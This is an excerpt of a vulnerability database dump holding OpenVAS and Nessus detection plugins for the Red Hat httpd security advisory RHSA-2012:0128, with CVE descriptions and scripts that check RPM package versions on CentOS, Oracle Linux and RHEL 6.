CVE-2011-4317)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2019-01-16T20:13:09", "bulletinFamily": "scanner", "description": "Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.", "modified": "2018-11-10T00:00:00", "published": "2012-02-16T00:00:00", "id": "CENTOS_RHSA-2012-0128.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57960", "title": "CentOS 6 : httpd (CESA-2012:0128)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0128 and \n# CentOS Errata and Security Advisory 2012:0128 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57960);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/10 11:49:29\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50494, 50802, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"CentOS 6 : httpd (CESA-2012:0128)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-February/018433.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?44f56a29\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-devel-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-manual-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-tools-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"mod_ssl-2.2.15-15.el6.centos.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:16:46", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2012:0128 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.", "modified": "2018-07-18T00:00:00", "published": "2013-07-12T00:00:00", "id": "ORACLELINUX_ELSA-2012-0128.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68458", "title": "Oracle Linux 6 : httpd (ELSA-2012-0128)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0128 and \n# Oracle Linux Security Advisory ELSA-2012-0128 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68458);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 50802, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"Oracle Linux 6 : httpd (ELSA-2012-0128)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0128 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-February/002606.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"httpd-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-devel-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-manual-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-tools-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mod_ssl-2.2.15-15.0.1.el6_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ssl\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:13:09", "bulletinFamily": "scanner", "description": "Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.", "modified": "2018-12-20T00:00:00", "published": "2012-02-14T00:00:00", "id": "REDHAT-RHSA-2012-0128.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57931", "title": "RHEL 6 : httpd (RHSA-2012:0128)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0128. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57931);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2018/12/20 11:08:45\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50494, 50802, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"RHEL 6 : httpd (RHSA-2012:0128)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0053\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-1391.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0128\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0128\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-debuginfo-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-devel-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-manual-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 